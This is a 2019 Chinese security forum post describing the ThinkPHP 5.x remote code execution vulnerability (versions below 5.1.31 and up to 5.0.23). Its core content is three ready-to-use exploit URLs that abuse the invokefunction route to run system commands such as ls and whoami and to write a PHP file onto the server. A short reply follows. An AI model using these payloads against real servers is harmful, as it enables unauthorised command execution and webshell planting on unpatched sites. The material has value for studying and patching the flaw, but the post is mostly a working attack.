K8安全团队
查看: 535|回复: 1

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

[复制链接]
  • TA的每日心情
    开心
    2017-6-13 17:07
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2019-1-15 16:17:33 | 显示全部楼层 |阅读模式

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    漏洞描述:
    由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell

    影响范围:v5.x < 5.1.31,<= 5.0.23
    漏洞详情:

    本地搭建了一个ThinkPHP5 的环境


    [AppleScript] 纯文本查看 复制代码
    https://www.k8sec.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

    1.jpg

    看看权限


    [AppleScript] 纯文本查看 复制代码
    https://www.k8sec.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
    


    写个phpinfo
    [AppleScript] 纯文本查看 复制代码
    https://www.k8sec.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php
    

    3.jpg
    4.jpg
    github上的一个poc利用

    游客,如果您要查看本帖隐藏内容请回复

    2.jpg

    该用户从未签到

    发表于 2019-1-20 11:23:14 | 显示全部楼层
    ThinkPHP V5.x 远程代码执行漏洞利
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    Powered by Discuz! X3.2 © 2001-2016 Comsenz Inc.

    返回顶部